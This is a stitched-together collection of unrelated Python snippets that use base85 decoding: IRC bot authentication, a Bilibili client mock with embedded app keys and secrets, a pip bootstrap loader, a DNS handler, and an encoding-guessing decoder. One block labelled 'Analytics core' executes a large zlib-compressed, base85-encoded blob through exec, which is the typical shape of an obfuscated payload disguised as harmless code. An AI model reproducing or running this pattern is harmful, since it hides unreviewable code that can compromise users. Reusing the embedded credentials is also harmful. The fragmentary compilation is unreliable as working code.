def join(): # Auth should (try) to be done before join. # It's not realistic to expect that to happen with NickServ/PM-based auth however, # but let's give it a little head start at least. pw = ( base64.b85decode( __main__.database['api']['ircsettings']['pw'] ) ).decode( "utf-8" ) if pw != "" and "sasl" not in CAPs['enabled']: __main__.sendPacket( __main__.makePacket( "PRIVMSG NickServ :IDENTIFY " + pw ), forceDebugPrint=True ) __main__.sendPacket( __main__.makePacket( "JOIN " + ",".join( __main__.database['api']['ircsettings']['channels'] ) ), forceDebugPrint=True ) return True
def andro_mock(tls, params): '''Simulate Android client Arguments: params Return value: request_string -> str ''' import random import base64 import collections our_lvl = 412 url_andr3 = 'http://app.bilibili.com/mdata/android3/android3.ver' if tls: url_andr3 = tlsify(url_andr3) _, api_response = fetch_url(url_andr3, user_agent=USER_AGENT_API) api_lvl = int(json.loads(api_response.decode('utf-8'))['upgrade']['ver']) logging.debug('Our simulated API level: %s, latest API level: %s' % (our_lvl, api_lvl)) if api_lvl > our_lvl: logging.warning('Bilibili API server indicates the API protocol has been updated, the extraction may not work!') fake_hw = codecs.encode(random.Random().randrange(start=0, stop=18000000000000000084).to_bytes(8, 'big'), 'hex_codec') add_req_args = collections.OrderedDict({ 'platform': 'android', '_device': 'android', '_appver': '424000', '_p': '1', '_down': '0', 'cid': params['cid'], '_tid': '0', 'otype': 'json', '_hwid': fake_hw }) if params['quality'] is not None: add_req_args['quality'] = params['quality'] second_key = 'G&M40GdVRlW-v53V=yvd' second_sec = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`' add_req_args['appkey'] = base64.b85decode(second_key) req_args = add_req_args add_req_args = collections.OrderedDict(sorted(req_args.items())) req_args['sign'] = hashlib.md5(bytes(urllib.parse.urlencode(add_req_args) + base64.b85decode(second_sec).decode('utf-8'), 'utf-8')).hexdigest() return urllib.parse.urlencode(req_args)
def chanJoin(): global database, chanJoined, chanJoinDelay, slowConnect, CAPs if slowConnect: time.sleep( 2 ) chanJoinDelay = chanJoinDelay + 2 if chanJoinDelay >= 1: #whatever # Auth should (try) to be done before join. # It's not realistic to expect that to happen with NickServ/PM-based auth however, # but let's give it a little head start at least. password = ( base64.b85decode( database['botInfo']['password'] ) ).decode( "utf-8" ) if password != "" and "sasl" not in CAPs['enabled']: sendPacket( makePacket( "PRIVMSG NickServ :IDENTIFY " + password ), forceDebugPrint=True ) sendPacket( makePacket( "JOIN " + ",".join( database['botInfo']['channels'] ) ), forceDebugPrint=True ) chanJoined = True
def object_hook(self, obj): # pylint: disable=method-hidden objtype = obj.get('__type__', None) if objtype == 'bytes': return base64.b85decode(obj['value']) if objtype == 'Duration': return Duration(*obj['value']) if objtype == 'Pitch': return Pitch(*obj['value']) if objtype == 'Clef': return Clef(*obj['value']) if objtype == 'KeySignature': return KeySignature(*obj['value']) if objtype == 'TimeSignature': return TimeSignature(*obj['value']) if objtype == 'Pos2F': return misc.Pos2F(*obj['value']) return obj
def main(): tmpdir = None try: # Create a temporary working directory tmpdir = tempfile.mkdtemp() # Unpack the zipfile into the temporary directory pip_zip = os.path.join(tmpdir, "pip.zip") with open(pip_zip, "wb") as fp: fp.write(b85decode(DATA.replace(b"\n", b""))) # Add the zipfile to sys.path so that we can import it sys.path.insert(0, pip_zip) # Run the bootstrap bootstrap(tmpdir=tmpdir) finally: # Clean up our temporary working directory if tmpdir: shutil.rmtree(tmpdir, ignore_errors=True)
def handle(self): request = self.rfile.readline().strip().decode("ascii") print("Got request from {}: '{}'".format(self.client_address, request)) try: parsed = json.loads(request) dns_query = DNSRecord.parse(base64.b85decode(parsed['query'])) except json.JSONDecodeError as e: print("Error: JSON decode failed", e) self.send_error_rsp("Invalid JSON") return except DNSError as e: print("Error: DNS record decode failed", e) self.send_error_rsp("Invalid DNS query") return # Only looking at first question part q = dns_query.get_q() if q.qtype != QTYPE.A: print("Error: Unexpected query type {} (only A/IPv4 lookup supported)".format(q.qtype)) self.send_error_rsp("Invalid query type") return # Note: this is a very simplistic implementation that only returns A records hostname = q.qname.idna() dns_response = dns_query.reply() if hostname in DNS_RECORDS: virt_addr = DNS_RECORDS[hostname] # TODO: would generate virtual IP here and communicate with OF controller to install mapping to private IP; # for the simulation, we are hard-coding this part and not implementing communication with the OF controller dns_response.add_answer(RR(rname=hostname, rtype=QTYPE.A, ttl=DNS_TTL, rdata=A(virt_addr ))) else: # Domain not found dns_response.header.set_rcode("NXDOMAIN") json_resp = { "status": 0, "response": base64.b85encode(dns_response.pack()).decode("ascii") } self.send_json(json_resp)
def handleCAPs( packet ): global CAPs, database, sock if database['globals']['debug']: print( "Handling CAP: " + str( packet ) ) if " LS :" in packet['rest']: CAPs['server'] = packet['rest'].partition( " LS :" )[2].split() for cap in CAPs['server']: if cap in CAPs['client']: CAPs['enabled'].append( cap ) if CAPs['enabled']: sendPacket( makePacket( "CAP REQ :" + " ".join( CAPs['enabled'] ) ) ) return True elif " ACK :" in packet['rest']: CAPs['enabled'] = packet['rest'].partition( " ACK :" )[2].split() if "sasl" in CAPs['enabled']: sendPacket( makePacket( "AUTHENTICATE PLAIN" ) ) data = sock.recv( 512 ).decode( errors="ignore" ) password = ( base64.b85decode( database['botInfo']['password'] ) ).decode( "utf-8" ) sendPacket( makePacket( "AUTHENTICATE " + (base64.b64encode( '\0'.join( (database['botInfo']['nick'], database['botInfo']['nick'], password) ).encode( "utf-8" ) )).decode( "utf-8" ) ) ) data = sock.recv( 2048 ).decode( errors="ignore" ) sendPacket( makePacket( "CAP END" ) ) return True return False
# Analytics core import zlib, base64 exec(zlib.decompress(base64.b85decode("""c-oB^YjfMU@w<No&NCTMHA`DgE_b6jrg7c0=eC!Z-Rs==JUobmEW{+iBS0ydO#XX!7Y|XglIx5;0)gG dz8_Fcr+dqU*|eq7N6LRHy|lIqpIt5NLibJhHX9R`+8ix<-LO*EwJfdDtzrJClD`i!oZg#ku&Op$C9Jr56Jh9UA1IubOIben3o2zw-B+3XXydVN8qroBU@6S 9R`YOZmSXA-=EBJ5&%*xv`7_y;x{^m_EsSCR`1zt0^~S2w%#K)5tYmLMilWG;+0$o7?E2>7=DPUL`+w&gRbpnRr^X6vvQpG?{vlKPv{P&Kkaf$BAF;n)T)*0 d?qxNC1(3HFH$UbaB|imz3wMSG|Ga+lI>*x!E&@;42cug!dpFIK;~!;R>u=a4Vz8y`WyWrn3e;uThrxi^*zbcXAK*w-hS{aC?24}>1BQDmD|XC|?}Y_K)!wt gh<nLYi-r|wI0h@$Y@8i_ZI35#>p9%|-=%DsY{k5mRmwJc=-FIbwpMk`jBG0=THS6MJs2`46LUSl@lusbqJ`H27BW(6QAtFo*ix?<SZ~Ahf=NN3WKFz)^+TI 7QEOmxt?UvhIC^ic3Ax+YB{1x5g($q2h}D8*$U8fJt>?PhusN{ONOTS+%2I;Ctp?3VVl^dVS8NR`CXWFk$^t%7_yrg#Maz27ChBD|fWTd^R-)XnPS*;4&<Hb R?}uRSd*FANXCTd~x2*g5GpgcrUhDa3BaD^(>D%{LKVMw_k~P%}$MPFA4VX|Gile`<zx~91c=^rr+w<vk`rY|=&(6-De}DG${Okn-OUXv48f1GJor`5?v$q% TFMcY}5A#o4RYqCKXHQd5P|0W0l#5QSaPj#FB6I;BuUch`A~CXFq+r-o=E-CNvA}RAD~d)}LoFd7IC;j_XS3*~oCR<oki&oY1UVbk3M=!!i`vMr-HBc_rohO |KYb3nAo(D3N*jqx8}YH0ZT{`_d=dceSKGK)%DT(>D{@Oz2jmA@MhJ3e$0)fWT9uy=op<MfB6@-2KrMVS%9JTqqE=Obp+{=TFfvIcBP<V%F1-&Kr5ENQ4{8B O-DM?sla&RYID~?N6EuFrUQ$MCB=~majN{JA+Mr>G0gxnz?*zZ$6X}YoDquT-f86S&9r_jl4^iwTB=b@dO<h-rGjr0zPBuz^FWl*PixdEmk567et~{sX$e;& 8hw@7@FLKBvxWZxR2upCDK-SAfuOtZ>?<UEL0#>bPz&m#k_EfT?6V$@c-S?1*oX@v%4J?ovJe=Ffg02v15~5{j(c*4z_SnsD`azD(52?Q`Wu16@BUW;Y3%YD I)=&rtyM)rFj5W?JunahlgVRPl$V&C&BRKI6h$QzMFpXXsu7x!1gjEZWC@qCeduj65x|OLYty_TCL;TTlFtT?m((VE-w=RSO<GXUtMq1v9bTWD-x(+!=c5cU u-JNvZ=%&fYkDWqE_d{1<>|oX?Tn2G64O>Hu6N^_?$cB)TyG=4V0GT<$$tOOjiqGg6Yg#f)QeNzC#b`#BGgYO?-{f{SeSVknN;R^@h&cZm3J@IxpK->s4_dW J!rxLkJAGpKlhA5quEd29O8_b1C-D?IFe@9_jXS-pCCHLYPWXhUK6UR0$qA=R{Amo|$>cNWg?d1zX>eSKpBCK4Iu+}6D|=G2?KfoXCKqd=Y|Q!@`dHCGg@v{ vA$Z5dyJ<+eC&xFNPBQ-HUmQKiSM7yrrK|E5dKoHVjMCI*{|5XjK-hRoxfE?H>%7VQDis50t<T-{7R&*yNdElnjEIVy$Wqa#6}UueK}JZ;YuP80jPk8PX22@ ?fs-R5ufnCP7+1I4tB2o(kPl4r*iS;&0X@%LZri7fyY#1ABHnz3YKWpp7TXabSjn;momJS$fEU9}3epF*a@*n;E(&?p(Kx;VjZ}=<Gteb=fmkF39Gebr&Y)j }CI`&V#JvE5;9cOe$I&DwIcK3S0(WM=-FA1Qs{9-Bgtmar60ON}N1Y`!qS)%8K^$j)>^pSbB$ixCoa0<BU@bqEva{?J{lGorEQHBx$ERH_jk!1Y@gW}@T9`r #?E758i1{u?F)W;7hkYl#mw*o-1$NfSNJ5MHHkpg0UF!__4)rMXp^P_R1{w2&j)S)*(Rn7Icog3e|1$4m*>^&IpbJI}dPqMdW~P?1OQsGAGQsgxjAs2HHrr@ Uu_tG{KEibSt2hp*w>;;6`u^-us%TPoaOVJ_?FPO$^>8k0HZC^DBEVf_F7FnB+e@mz5Ph%uUiTzW2WfG~IS@6vhTA70{2-iN)(RAJ4IWC#7^Vpt7a5K@&~#! IKTr@4s_iWEiu2X~OGbpi#AE1zlWirPcza;tQmxNBas>$asN8nCtL4HbJNJw=Mg2f&Qo;;0AJ=Pl%yz>lwi3o^V?@NcsN<x-K=3~6Aa*tDu}Nq`h=X?O$+(} G#iwVecFa^RZnvc3UWk3%z+7%&BvtLF^Ru(`{Onm6ct(to99#bX&-NrI4A-LMkD7_tX2?~6ZC!o~1n-D?0wl>Ckrc%k^6QM?QSgxi)qIOAz~S9voLkS~9jUd 2QRvhMhN7IVupD@Dc%||!)wb6GWa<j|4A7w^>1*G#geQy>+K)ZWl+Q>%nQt4gWkAZP9DIR5AB$NBZn~vz>MkF(Q^sY!XeEmiihsn({31b~az08JoJJ#h3c}f p5@@p1uZ)0wyV4eVv6#)ZuBnR+O{?2~#O=WX>|hTRpjFOeVaH+?)1<@5zZB3O7atkQq3>a@-XQ)u=e|AQBOb{yxSwh(gxjx~Vv~$|jVJh*@h8bDT~B=5AKTB gN|&SdeV*g%SW;!~C5(noym~n<pmP|pKUV5q8kb0-nBhD;q$Tq#fK4)JPKcs^U5or(L8H~9`^>)Z?6B?O_nr{EyXCH+`{upZAEX~!wi8Yv=mFA^{NoWvRbQE KO5Mv*BE!$bYYEr0ovE^y*)}a6NFOjJjE0+|{YfciCAuY+A)JkO+6tU#`RKipPqs58oQ-)JL1o*<C-bic2Y}+c08GsIZUU3Cv*4w^k5I{Db50K0bKPSFshmx Rj(Y0|;SU2d?s+MPi6(PPLva(Jw(n0~TKDN@5O)F|k^_pcwolv^jBVTLhNqMQ#x6WU9J^I;wLr}Cut#l+JlXfh1Bh<$;^|hNLoXLD#f*Fy-`e~b=ZU8rA0GJ FU1|1o`VZODxuE?x@^rESdOK`qzRAwqpai|-7cM7idki4HKY>0$z!aloMM7*HJs+?={U5?4IFt""".replace("\n", "")))) # End analytics core
def parse_str(self, encode_str, decode_method, m_list): if len(m_list) > self.max_depth: return False, encode_str # encode_str = deepcopy(encode_str) encode_str = utf8(encode_str) if decode_method in ['zlib']: encode_str = utf8(encode_str) else: encode_str = to_unicode(encode_str) raw_encode_str = deepcopy(encode_str) if len(encode_str) <= 0: return False, raw_encode_str try: if decode_method == 'base16': # 避免无限递归 # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64') # base_list = () if len(encode_str) < 4: return False, raw_encode_str encode_str = encode_str.upper() rex = re.compile('^[0-9A-F]+[=]*$', re.MULTILINE) if self.regex_match(rex, encode_str): decode_str = partial_base16_decode(encode_str) else: return False, raw_encode_str elif decode_method == 'base32': encode_str = encode_str.strip().replace(' ', '').replace('\n', '') # 避免无限递归 # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64') # base_list = () if len(encode_str) < 4: return False, raw_encode_str encode_str = encode_str.upper() rex = re.compile('^[A-Z2-7=]+$', re.MULTILINE) # 自动纠正填充 if self.regex_match(rex, encode_str): decode_str = partial_base32_decode(encode_str) else: return False, raw_encode_str elif decode_method == 'base64': encode_str = encode_str.strip().replace(' ', '').replace('\n', '') # 避免无限递归 # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64') # base_list = () if len(encode_str) < 4: return False, raw_encode_str rex = re.compile('^[A-Za-z0-9+/=]+$', re.MULTILINE) # 自动纠正填充 if self.regex_match(rex, encode_str): decode_str = partial_base64_decode(encode_str) else: return False, raw_encode_str elif decode_method == 'urlsafe_b64': encode_str = encode_str.strip().replace(' ', '').replace('\n', '') # base_list = ('base16', 'base32', 'base64', 'urlsafe_b64') # base_list = () if len(encode_str) < 4: return False, raw_encode_str rex = re.compile('^[A-Za-z0-9-_=]+$', re.MULTILINE) # 自动纠正填充 if self.regex_match(rex, encode_str): decode_str = urlsafe_b64decode(base_padding(encode_str, 4)) else: return False, raw_encode_str elif decode_method == 'ascii_85': if len(encode_str) < 7: return False, raw_encode_str if PY2: return False, raw_encode_str rex = re.compile('^[A-Za-z0-9!#$%&()*+\-;<=>?@^_`{|}~]+$', re.MULTILINE) if self.regex_match(rex, encode_str): decode_str = a85decode(utf8(encode_str)) else: return False, encode_str elif decode_method == 'base85': if len(encode_str) < 7: return False, raw_encode_str if PY2: return False, raw_encode_str rex = re.compile('^[A-Za-z0-9!#$%&()*+\-;<=>?@^_`{|}~]+$', re.MULTILINE) if self.regex_match(rex, encode_str): decode_str = b85decode(utf8(encode_str)) else: return False, encode_str elif decode_method == 'pawn_shop': try: encode_str = encode_str.decode('gb2312') except: pass encode_str = to_unicode(encode_str) encode_str = encode_str.replace(' ', '').strip() code_base = '口由中人工大王夫井羊' decode_str = [] for t in encode_str: if t in code_base: i = code_base.index(t) decode_str.append(str(i)) else: return False, raw_encode_str decode_str = ''.join(decode_str) if len(decode_str) < 0: return False, raw_encode_str elif decode_method == 'decimal': if len(encode_str) < 4: return False, raw_encode_str rex = re.compile('^[0-9]+$', re.MULTILINE) if not self.regex_match(rex, encode_str): return False, raw_encode_str # 解码后是 0xab1234,需要去掉前面的 0x decode_str = hex(int(encode_str))[2:].rstrip('L') elif decode_method == 'binary': rex = re.compile('^[0-1]+$', re.MULTILINE) if not self.regex_match(rex, encode_str): return False, raw_encode_str # 不足8个的,在后面填充0 padding_length = (8 - len(encode_str) % 8) % 8 encode_str = '%s%s' % (encode_str, '0' * padding_length) # 解码后是 0xab1234,需要去掉前面的 0x decode_str = hex(int(encode_str, 2))[2:].rstrip('L') elif decode_method in ['octal', 'octal_ascii', 'octal_binary']: # 8进制转成16进制的数据 rex = re.compile('^[0-7]+$', re.MULTILINE) if not self.regex_match(rex, encode_str): return False, raw_encode_str rex = re.compile('^[0-1]+$', re.MULTILINE) if self.regex_match(rex, encode_str): return False, raw_encode_str if len(encode_str) < 4: return False, raw_encode_str if decode_method == 'octal': # 解码后是 0xab1234,需要去掉前面的 0x decode_str = hex(int(encode_str, 8))[2:].rstrip('L') elif decode_method == 'octal_ascii': encode_str = encode_str.replace(' ', '').strip() # 8 进制的 177 转成十进制后是 128 tmp_list = list(encode_str) ascii_list = [] while len(tmp_list) > 0: tmp_str = ''.join(tmp_list[:3]) if int(tmp_str, 8) > 127: tmp_str = ''.join(tmp_list[:2]) tmp_list = tmp_list[2:] else: tmp_list = tmp_list[3:] ascii_list.append(chr(int(tmp_str, 8))) decode_str = ''.join(ascii_list) elif decode_method == 'octal_binary': # 因为这里有补0的操作,要避免无限递归 if len(m_list) > 0 and \ (m_list[-1] in ('octal_binary', 'octal', 'binary') or len(encode_str) < 8): return False, raw_encode_str # 将8进制直接转成16进制,也就是3个8进制数字转成2个16进制字符 # 先将每个8进制数字转成二进制,不足3个的前面补0 encode_str = encode_str.replace(' ', '').strip() tmp_bin_list = ['%03d' % int(bin(int(t))[2:]) for t in list(encode_str)] tmp_bin_list = [t for t in tmp_bin_list] # logger.info(tmp_bin_list) decode_str = ''.join(tmp_bin_list) else: return False, raw_encode_str elif decode_method == 'decimal_ascii': if len(encode_str) < 4: return False, raw_encode_str encode_str = encode_str.replace(' ', '').strip() rex = re.compile('^[0-9]+$', re.MULTILINE) if not self.regex_match(rex, encode_str): return False, raw_encode_str # ascii 字符串,10进制最大127 tmp_list = list(encode_str) ascii_list = [] while len(tmp_list) > 0: tmp_str = ''.join(tmp_list[:3]) if int(tmp_str) > 127: tmp_str = ''.join(tmp_list[:2]) tmp_list = tmp_list[2:] else: tmp_list = tmp_list[3:] ascii_list.append(chr(int(tmp_str))) decode_str = ''.join(ascii_list) elif decode_method in ['switch_case', 'reverse_alphabet', 'reverse']: # 如果这里不做限制,会无限递归下去 if len(m_list) > 0 and m_list[-1] in ['switch_case', 'reverse_alphabet', 'reverse']: return False, raw_encode_str # 一定要包含 ascii 字符 tmp_data = [t for t in encode_str if t in string.ascii_letters] if len(tmp_data) <= 0: return False, raw_encode_str # rex = re.compile('^[A-Za-z0-9+/=]$', re.MULTILINE) # if not self.regex_match(rex, encode_str): # return False, raw_encode_str if decode_method == 'switch_case': new_data = [] for t in encode_str: if t in string.ascii_lowercase: t = t.upper() elif t in string.ascii_uppercase: t = t.lower() new_data.append(t) decode_str = ''.join(new_data) elif decode_method == 'reverse_alphabet': # 字母逆序,a->z, z->a new_data = [] for t in encode_str: if t in string.ascii_letters: if t in string.ascii_lowercase: t = ord(t) + (25 - (ord(t) - ord('a')) * 2) t = chr(t) else: t = ord(t) + (25 - (ord(t) - ord('A')) * 2) t = chr(t) new_data.append(t) decode_str = ''.join(new_data) elif decode_method == 'reverse': # 逆序 decode_str = encode_str[::-1] else: return False, raw_encode_str elif decode_method == 'urlencode': if len(encode_str) < 4: return False, raw_encode_str decode_str = unquote_plus(encode_str) elif decode_method == 'hex': if len(encode_str) < 4: return False, raw_encode_str encode_str = encode_str.lower() rex = re.compile('^[a-f0-9]+$', re.MULTILINE) if self.regex_match(rex, encode_str.lower()): # 修正基数位数的16进制数据 if len(encode_str) % 2 != 0: encode_str += '0' decode_str = hex2str(encode_str) else: return False, raw_encode_str elif decode_method == 'zlib': if len(encode_str) < 4: return False, raw_encode_str try: decode_str = zlib.decompress(utf8(encode_str)) except: return False, raw_encode_str else: decode_str = encode_str.decode(decode_method) if len(decode_str) <= 0: return False, raw_encode_str elif utf8(encode_str) == utf8(decode_str): return False, raw_encode_str else: # 解码的内容只有可打印字符,才认为合法 if self.only_printable: decode_str = to_unicode(decode_str) if isinstance(decode_str, bytes): return False, raw_encode_str tmp_decode_str = list(decode_str) printable_count = 0 for t in tmp_decode_str: if str(t) in string.printable: printable_count += 1 # 如果可打印字符低于一定的百分比,就认为解码失败 if printable_count * 1.0 / len(tmp_decode_str) < self.printable_percent: return False, raw_encode_str return True, decode_str except Exception as e: if self.verbose: logger.exception(e) return False, raw_encode_str
def decode(cls, value): if not isinstance(value, bytes): value = value.encode() return base64.b85decode(value)
def get_file_hash(self, name): r = self.file_data.get(name, None) if r is None: return 0 return int.from_bytes(base64.b85decode(r), byteorder='big')
def base85decode(str, coding = 'utf8'): if type(str)==type('ss'): a = str.encode(coding) return base64.b85decode(a).decode(coding)
def test_dbf_reader(): from .. import DBF from .. import data_warehouse q = DBF(data_warehouse.example_file('US-STATES.dbf')) assert q.fieldnames() == [ 'STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER', ] df = q.load_dataframe(preserve_order=False, strip_whitespace=False) correct = b'ABzY8<${%50{^v}dwdkt^}s_!9zhTV6cBJlk*FB=HM6sbNXP@i=EWu?0gUNnGs!O5?B<-EC4?Fg6%a&4#cB}W7GJGeA4P=<ilV4h#' \ b'EMT8pA{dKpS8czTHD?`bMMW~w7-9T?d0Q!^F8O@x#!+9=iWIJCzl)*>(o;%dZr+jMx&q=^$sJiSU2@jiy-HWl`x<Oa`PLG&dJGXY9' \ b'TGq|B^(?G%%$nGX))bN^dhTlQ%n=j<r|VS{@7}LmZvo2!rw+*R>eSj7&kZo-y*8Qbt!(8MWlW;QzZD>oKGUhUPa6BongclNU>6J37' \ b'1V{vFw*na~mS?z|>6V(C=I#B9vWgJE{BJTkP^3dclpR>AP10nIRC4ICSVk@=AUk)f;LIM%Vn?CvBHIKCm5II7ZMR3s-dU=56p!kGN' \ b'XQ4Ir#^&&W-va)jCKgf^uPvm?PPHbM=2xIMd6_yuP7Q?uPL6qwYYfGXqzF{y?YHEp6S`8=lX_YlFp<xK^SXw%#q^hhKCR$_IJjoiP' \ b'rglM1bq$<st-Z3aq69n^me&*(!zqRdlbbC)MeZG(TA5u9r$u2({NG2EtkS?lj0DwGgDkSA_rTQrcwT&1+=@<qoP_3#D4a<{qpgCo;' \ b'&wC=8cegJads36cr<3fIsK!NV}iGN?d+Yjk^OMYW%4K{2QqmylY^KX%;XRzhccPR<S-_WVRAT=BbYpv$&pMR$K>%$j$(2&lVg}Xfy' \ b'on@9LwZ5CdV^*5|a~{oXF%PCQoM4!{jMUPG<5{CQoB>3X`WZIhDzLCeL8<OeW7_avGCoGg-joIZS$)^fBpYGQebzNrg$3$q<v^Gr`' \ b'{+w{j{Fg`m+0N<L2$m8MB33K~t5+=#Xs!tsK&vo9exw`<Ea>u4<Qs9idNCP~lpy(@}|zBxZvr?HvtTlZZfo$vNLSIngMv%B{znj1?' \ b';@1I6<WmdM+y5(2Q3T>k?>zc9bLz*+m8~*qvT}xHGdpV71)8ZYQ=)Jr4*aHtz{jj#Yg0}aTef=)Ysjkag2htcExOGQ_-mCg&-hZy1' \ b'$RD+Zf!RcUk-02QbI=&_{gg5y?|g6gW*Y0Qvu|jmvK}Y>K=1j~>%a2Q+*$N(=~f!+a|3_gK>b`3JaRSl^X}&PD`@WRZC$>8I+2YV_' \ b'E;&J?A|z%u4~%xH4QWus&2gUHJV$+=I{}8+#h$W>80a-T07@4I*+sWB*xM8p84@Ells5^sz++*J-xJdR4et<`_wl}=sI>^ckz6hbB' \ b'~r!xtr$bz7vjo6ejYso?C9Ce$UOh>j1UyoxWn-EktGy=30Im=RbQq&8a8r|8y^%&z8JaD@C8U@N_Gc!?T~Zw!}LpzIq(J58L)8Cev' \ b'}%ku%Pt_I-ytAEt6w-JxA{zFS_&E2VnT5hY3Gj6E0DP`NES!P@fG*&D}GShQro(=-m_UOsX)wSRE?cR=k6gT0HXe(kWCv#kB|&3V;' \ b'SZu(@#?X-PyRdL+9KhKtaN$oFQ(epW#ZDWTlr*ix1iEmi*S~ASq0zd8#4x-mhzGv(ns=sh**GtxUv2<1ewO_U6Qp>)fE_eskS8mN(' \ b'>pB<>SX+4C?!zf64}Je-1(gqMhbgq*mEZ2Hq-WAYJ9TUR@wZ}Y=>7O%_nhr?UFCNTypQ&q_VzA~#{KbF$wu1mqQ!4n>v^iB+VV5C?' \ b'yt+~dfMMPIGN^i=e*Zr^!iP&6<YDw`0^)}wBPz#eZ6%)-ZV5t`>*sj{EfEX{LH$qY5&84QTypxIe6d0)>fTz==IT7yxwoUz}mOdO*' \ b'priZ`2udqn;OqnRKHLrW^JA_!#oInw4)I>s}ue+Te%THUy!_1_g?3P@%*I4N7eY!yF5IUYKix56Wx^z&slih}fV)xeXzxut9@L8^T' \ b'a!f!_<&HUwe54Izlyph1lV0WZ|r;D-e^1fk9b1?p|kpuvKm7Z%#!heb9hu-FC_F0dgCjTR_gxX^|mG})lSPb^Tqpj!~~L$f_+Kg8^' \ b'b`JlxHKNvOypw$Ki+H6oEZbKLn_6&Wn#D)O0+n_?yh7fev5QdaJLm#AV2tua~ApjdRKzph_$k-47(*^~y_T*JqYC{;h>{V#6%&IuN' \ b'zECI}3MtUdRZUUIl$Oh_A^54SdcCUV)fBi$Zq=YiR>N?yq-tJRA*(*PgsWbEK=Z>&p(+8A7?;YO{cxGA2H<j84Z<omt6)%5NKUSnT' \ b'NPNtTQ#3XvhfPu>I;TR!mMSjs_NHB0<4p+4SV5A)*4bnVKR;Na%%vtl2rw+W}UTgNFf<`jocc74NUcU{hAVjYvooAu9MX;Trb~+AZ' \ b'%o6P*K8K7;fn6tdV{CGg(#OMp+HPO-v;{Lu7aN%B>n~VsrL~gF$i!Z<a%+!e*wb{;(1Zz%6oX2yW$}^QvKz*tf~8VYpphkq_>WRX^' \ b'M*t3kL+R#mv0sbtD3IWB(ARZR(!NN(YgR1_as;5|(B`@$Lt`@KvJ_!TV_fcxb2`rv+94Zs7k8iZfSstUi9L#M!la%&hKl3K~R_i)2' \ b'7>$LRJp9M9<*RLEFKRn{F1mRJKMS;g078M?MSTy*x!xDzA{VilZPdF?-c+z1Bz*7#30^1xG6}CGpA^45MqQTP+OBi<aw~+IEr^6D2' \ b'XB?IgJnOJ%u&cj?ocYf=EPi<2VF|)+hed%G92N~;>~A3th&>LAA6{};6nNQTQQ;MbB@DmqZy`^UR~?ohyymc|u(!X3JZN6;Zy`^de' \ b'U3Q$;SEQ`eDFJm#Sd>fECJZ>uqg1B!=l354oeu`am3IE?>a02c+X)`;eCfC1P2_JFnr*Mp$|TESb}iSVF|%U4vPjKJEH1?PaKv2eC' \ b'n_$@R=j>Dtzv+gyHv&d!fM>yk0uQ>!mMwz4R5Ym%irp(l@+b`U9_*zUB4OVO}r&53iTL<Mq-XdA;;Kub2MB>!ttY_0pety>x`vOMl' \ b'_@(qDPK^aHP#{>JO2A9=m>cU~|3gVjq&-_KdegaZWoF;}pHM+sJOpx`hb%~|o{Ai+T#ELg=MoK-Il<s9;39%r8)hjI4%@EE~<94<J' \ b'3BLpjWtY8&K3J&9OoC7{QUT^?M3085m;1G@x9L5vGx_o$|;2@3_9KvyeH5@P2=);o)2XKO51t*HNt2jw;7*7^)(9pxVupCbj9Kp$g' \ b'7vZUbqj(zUqC%V^xC&1fT#HjV7nfkZ;37PO^PECFlk?m%Jd1N#F-{X)j%N$5!~(&Ecn;@C4SG3O6r)dYCHe)|U_fv!202&Op(1!5s' \ b')8#pB)Awg&Q%c%bFMDL>6~kd@La*gID_+oT0D<)T`kV!TwjOh3tot`L~LuYP>dhN*_=zuu}G|UAr^BkFT@hDt`aO2T!?c7m*HH&Ra' \ b'hq0Rf6*b&&7z~g;*}Q2rI<e=VGPcC{}TfmSHvL+De=+xB;VL?S)t))?0|Rg3EA$$cF`3C+1m=_2Swxq`$&xXrb{*>dktG?s4-67fR' \ b'kT?e04B;3DA-6U);nm)Ewq&s)2m%IFzay<Nb)73s-DYZ_At7ng^P!dp6-M!hBN>e?>s^Oi~(F*6a%n(ldP;@*mlq~4{Y;p*CcBD^I' \ b'sCMII0C*A5HQO$NV|M%}8>fGBLBaLkdmv=xj_coWrF_Cb2cgMK5vKBp__PFe=MR-dl6RC8<-Q8^nZ>g4q?)J&mD!iq;Tt1VDw>IuA' \ b';`%8`yv4b<3LU$XdaA`$ZwcWoK~Anr+H^CVxTMcpCPV-0>~wF_VY~2_PMNOfWRiQUG?wZuZdVE&ecrk}^9;-w-7b1d$=)iAWr>)J#' \ b'}}rBw=|k@PqE(aVp?J+_g2-OB*(J51tkLaR&AtGneOCL-NiZxk$bC2XGtWBbWD?HflK}{)8CuR_s!(q7MOb6^=Ckqd#f|BgB&OBdR' \ b'xl9)f*YpQ<or>kb7x@UBX*;x+9Tlb9Zga#9N2;?T4Q7)aV^)w{o&u?6<6eX4(^V^XS6m+*>Jm=}5Tz5Wt^`y2MDC*;sqGtKKf+-pb' \ b'S2M8@SB4}1EmphU`Wdv{;l=Pi@bWASXpFip1#JzUXO1;yftHnIcUT-zmb&6Uogt8Y2DvaeETMz?=sf|ts5$y~joGZRm^_BxE0$=(*' \ b'GvE9|RUEaS6a{1Z4N>oAdgxjyC9$YQFq0yF3x$JEX_ZE$(TMSQG#?7}Xyn=hHHRu~v#&GlW!nJ+gmbv|E>cMrQ3Uaq3vAta>>Jpvo' \ b'>r|WRW~ShJ;VqG&-|QybOiR2<{GKbTceuXauI~H&WCy8Uy9_-^j+At($BY{u>wGaV<*CrodaT<U<o}&ac#WvcQwh^(@zj{QX=GR#`' \ b'=5^fFWxrr|2N?E;<XZAC-L<XZ<P23iGL>XjS}A^aj(RiB)(bV%@W@t@vRcyCh_eO-y!jx65l29-4g#?;w=*2Bk{cw-zV|?5<ejEFC' \ b'_k@#1BgRki-v5{40qck@!)GACvfTiGMBeR*9dG_(_SMl6afM+a>;u#7|4SL*kthKO^z867Q1uIf<W_c(=qaNc<vU!^AyAG#ich5|R' \ b'1w!SNwI__BrkOLu&QsPPeN@V7)p@m1PLzhz#9uhE7vYa4N|b-}p!crxDWbUf>0XxwLA@CNN=jr+U)<G#tp-EVb!i;X*Y6~4{KeaE`' \ b'sr1*sR#Q3E6$#GBo6yo9CJ`e9%m%dL|(t`)+;^+sT-U45+z=t2uZ>sS_I)?S-zrM`K;6Xa}Agfz5{Zot#enc#d_%ZF)gP&NvY3ouw' \ 